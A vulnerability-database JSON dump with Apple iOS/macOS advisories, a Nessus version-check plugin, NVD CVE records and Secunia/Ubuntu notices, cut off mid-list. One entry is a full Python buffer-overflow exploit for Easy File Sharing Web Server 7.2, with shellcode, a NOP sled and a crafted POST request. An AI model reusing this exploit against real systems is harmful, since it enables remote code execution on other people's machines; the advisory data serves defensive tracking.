Lin of Ant Security Light-Year Lab\n\nCVE-2020-29619: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29618: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29611: Alexandru-Vlad Niculae working with Google Project Zero\n\nEntry updated December 17, 2020\n\n**Security**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Unauthorized code execution may lead to an authentication policy violation\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-27951: Apple\n\n**WebRTC**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-15969: an anonymous researcher\n", "edition": 4, "modified": "2020-12-22T05:53:47", "published": "2020-12-22T05:53:47", "id": "APPLE:HT212003", "href": "https://support.apple.com/kb/HT212003", "title": "About the security content of iOS 14.3 and iPadOS 14.3 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-12-22T03:30:50", "description": "The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.6 Security Update 2020-007\nMojave, 10.15.x prior to 10.15.7 Security Update 2020-001 Catalina, or 11.x prior to 11.1. It is, therefore, affected by\nmultiple vulnerabilities, including the following:\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution. (CVE-2020-9960,\n CVE-2020-10017, CVE-2020-27908, CVE-2020-27910, CVE-2020-27916, CVE-2020-27948)\n\n - Processing a maliciously crafted image may lead to arbitrary code execution. (CVE-2020-9962,\n CVE-2020-27912, CVE-2020-27919, CVE-2020-27923, CVE-2020-27924, CVE-2020-29611, CVE-2020-29616,\n CVE-2020-29618)\n\n - Processing a maliciously crafted font file may lead to arbitrary code execution. (CVE-2020-9956,\n CVE-2020-27922, CVE-2020-27931, CVE-2020-27943, CVE-2020-27944, CVE-2020-27952)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-18T00:00:00", "title": "macOS 10.14.x < 10.14.6 Security Update 2020-007 / 10.15.x < 10.15.7 Security Update 2020-001 / macOS 11.x < 11.1 (HT212011)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-27926", "CVE-2020-27943", "CVE-2020-29612", "CVE-2020-27931", "CVE-2020-9974", "CVE-2020-27898", "CVE-2020-29620", "CVE-2020-15969", "CVE-2020-29617", "CVE-2020-27923", "CVE-2020-27944", "CVE-2020-9967", "CVE-2020-29616", "CVE-2020-27949", "CVE-2020-10004", "CVE-2020-27896", "CVE-2020-27903", "CVE-2020-27912", "CVE-2020-27941", "CVE-2020-27897", "CVE-2020-27901", "CVE-2020-10010", "CVE-2020-10009", "CVE-2020-27919", "CVE-2020-10007", "CVE-2020-10015", "CVE-2020-29619", "CVE-2020-10012", "CVE-2020-27906", "CVE-2020-9962", "CVE-2020-9943", "CVE-2020-27924", "CVE-2020-9978", "CVE-2020-27907", "CVE-2020-27915", "CVE-2020-10002", "CVE-2020-9956", "CVE-2020-29611", "CVE-2020-27908", "CVE-2020-27921", "CVE-2020-9960", "CVE-2020-10016", "CVE-2020-29621", "CVE-2020-9944", "CVE-2020-27952", "CVE-2020-27947", "CVE-2020-27920", "CVE-2020-27911", "CVE-2020-13524", "CVE-2020-10014", "CVE-2020-27910", "CVE-2020-9975", "CVE-2020-10017", "CVE-2020-27914", "CVE-2020-27946", "CVE-2020-29618", "CVE-2020-27916", "CVE-2020-27948", "CVE-2020-27922"], "modified": "2020-12-18T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOS_HT212011.NASL", "href": "https://www.tenable.com/plugins/nessus/144453", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144453);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/21\");\n\n script_cve_id(\n \"CVE-2020-9943\",\n \"CVE-2020-9944\",\n \"CVE-2020-9956\",\n \"CVE-2020-9960\",\n \"CVE-2020-9962\",\n \"CVE-2020-9967\",\n \"CVE-2020-9974\",\n \"CVE-2020-9975\",\n \"CVE-2020-9978\",\n \"CVE-2020-10002\",\n \"CVE-2020-10004\",\n \"CVE-2020-10007\",\n \"CVE-2020-10009\",\n \"CVE-2020-10010\",\n \"CVE-2020-10012\",\n \"CVE-2020-10014\",\n \"CVE-2020-10015\",\n \"CVE-2020-10016\",\n \"CVE-2020-10017\",\n \"CVE-2020-13524\",\n \"CVE-2020-15969\",\n \"CVE-2020-27896\",\n \"CVE-2020-27897\",\n \"CVE-2020-27898\",\n \"CVE-2020-27901\",\n \"CVE-2020-27903\",\n \"CVE-2020-27906\",\n \"CVE-2020-27907\",\n \"CVE-2020-27908\",\n \"CVE-2020-27910\",\n \"CVE-2020-27911\",\n \"CVE-2020-27912\",\n \"CVE-2020-27914\",\n \"CVE-2020-27915\",\n \"CVE-2020-27916\",\n \"CVE-2020-27919\",\n \"CVE-2020-27920\",\n \"CVE-2020-27921\",\n \"CVE-2020-27922\",\n \"CVE-2020-27923\",\n \"CVE-2020-27924\",\n \"CVE-2020-27926\",\n \"CVE-2020-27931\",\n \"CVE-2020-27941\",\n \"CVE-2020-27943\",\n \"CVE-2020-27944\",\n \"CVE-2020-27946\",\n \"CVE-2020-27947\",\n \"CVE-2020-27948\",\n \"CVE-2020-27949\",\n \"CVE-2020-27952\",\n \"CVE-2020-29611\",\n \"CVE-2020-29612\",\n \"CVE-2020-29616\",\n \"CVE-2020-29617\",\n \"CVE-2020-29618\",\n \"CVE-2020-29619\",\n \"CVE-2020-29620\",\n \"CVE-2020-29621\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212011\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2020-12-14\");\n script_xref(name:\"IAVA\", value:\"2020-A-0576\");\n\n script_name(english:\"macOS 10.14.x < 10.14.6 Security Update 2020-007 / 10.15.x < 10.15.7 Security Update 2020-001 / macOS 11.x < 11.1 (HT212011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.6 Security Update 2020-007\nMojave, 10.15.x prior to 10.15.7 Security Update 2020-001 Catalina, or 11.x prior to 11.1. It is, therefore, affected by\nmultiple vulnerabilities, including the following:\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution. (CVE-2020-9960,\n CVE-2020-10017, CVE-2020-27908, CVE-2020-27910, CVE-2020-27916, CVE-2020-27948)\n\n - Processing a maliciously crafted image may lead to arbitrary code execution. (CVE-2020-9962,\n CVE-2020-27912, CVE-2020-27919, CVE-2020-27923, CVE-2020-27924, CVE-2020-29611, CVE-2020-29616,\n CVE-2020-29618)\n\n - Processing a maliciously crafted font file may lead to arbitrary code execution. (CVE-2020-9956,\n CVE-2020-27922, CVE-2020-27931, CVE-2020-27943, CVE-2020-27944, CVE-2020-27952)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.14.6 Security Update 2020-007 / 10.15.7 Security Update 2020-001 / macOS 11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27926\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { 'max_version' : '10.14.6', 'min_version' : '10.14', 'fixed_build': '18G7016', 'fixed_display' : '10.14.6 Security Update 2020-007 Mojave' },\n { 'max_version' : '10.15.7', 'min_version' : '10.15', 'fixed_build': '19H114', 'fixed_display' : '10.15.7 Security Update 2020-001 Catalina' },\n { 'min_version' : '11.0', 'fixed_version' : '11.1', 'fixed_display' : 'macOS Big Sur 11.1' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-03-20T09:21:42", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2017-06-13T00:00:00", "title": "Easy File Sharing Web Server 7.2 - POST Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-06-13T00:00:00", "href": "https://0day.today/exploit/description/27944", "id": "1337DAY-ID-27944", "sourceData": "#!/usr/bin/python\r\n \r\n# Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow\r\n# Author : Touhid M.Shaikh\r\n# Date : 12 June, 2017\r\n# Contact: [email\u00a0protected]\r\n# Version: 7.2\r\n# category: Remote Exploit\r\n# Tested on: Windows XP SP3 EN [Version 5.1.2600]\r\n \r\n \r\n\"\"\"\r\n######## Description ########\r\n \r\n What is Easy File Sharing Web Server 7.2 ?\r\n Easy File Sharing Web Server is a file sharing software that allows\r\nvisitors to upload/download files easily through a Web Browser. It can help\r\nyou share files with your friends and colleagues. They can download files\r\nfrom your computer or upload files from theirs.They will not be required to\r\ninstall this software or any other software because an internet browser is\r\nenough. Easy File Sharing Web Server also provides a Bulletin Board System\r\n(Forum). It allows remote users to post messages and files to the forum.\r\nThe Secure Edition adds support for SSL encryption that helps protect\r\nbusinesses against site spoofing and data corruption.\r\n \r\n \r\n######## Video PoC and Article ########\r\n \r\nhttps://www.youtube.com/watch?v=Mdmd-7M8j-M\r\nhttp://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/\r\n \r\n \"\"\"\r\n \r\nimport httplib\r\n \r\n \r\ntotal = 4096\r\n \r\n#Shellcode Open CMD.exe\r\nshellcode = (\r\n\"\\x8b\\xec\\x55\\x8b\\xec\"\r\n\"\\x68\\x65\\x78\\x65\\x2F\"\r\n\"\\x68\\x63\\x6d\\x64\\x2e\"\r\n\"\\x8d\\x45\\xf8\\x50\\xb8\"\r\n\"\\xc7\\x93\\xc2\\x77\"\r\n\"\\xff\\xd0\")\r\n \r\n \r\nour_code = \"\\x90\"*100 #NOP Sled\r\nour_code += shellcode\r\nour_code += \"\\x90\"*(4072-100-len(shellcode))\r\n \r\n# point Ret to Nop Sled\r\nour_code += \"\\x3c\\x62\\x83\\x01\" # Overwrite RET\r\nour_code += \"\\x90\"*12 #Nop Sled\r\nour_code += \"A\"*(total-(4072+16)) # ESP pointing\r\n \r\n \r\n \r\n# Server address and POrt\r\nhttpServ = httplib.HTTPConnection(\"192.168.1.6\", 80)\r\nhttpServ.connect()\r\n \r\nhttpServ.request('POST', '/sendemail.ghp',\r\n'Email=%s&getPassword=Get+Password' % our_code)\r\n \r\nresponse = httpServ.getresponse()\r\n \r\n \r\nhttpServ.close()\r\n \r\n\"\"\"\r\nNOTE : After Exiting to cmd.exe our server will be crash bcz of esp\r\nAdjust esp by yourself ... hehhehhe...\r\n\"\"\"\r\n \r\n\"\"\"\r\n__ __| _ \\ | | | |_ _| __ \\\r\n | | | | | | | | | |\r\n | | | | | ___ | | | |\r\n _| \\___/ \\___/ _| _|___|____/\r\n \r\nTouhid M.Shaikh\r\n\"\"\"\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27944"}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research &#40;now part of Flexera Software&#41; 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1&#41; Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2&#41; Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3&#41; Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS &#40;Denial of Service&#41; and compromise an application using the SDK.\r\n\r\n1&#41; An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2&#41; An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4&#41; Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5&#41; Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6&#41; Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research &#40;now part\r\nof Flexera Software&#41;.\r\n\r\n======================================================================\r\n\r\n7&#41; References\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8&#41; About Secunia &#40;now part of Flexera Software&#41;\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9&#41; Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", 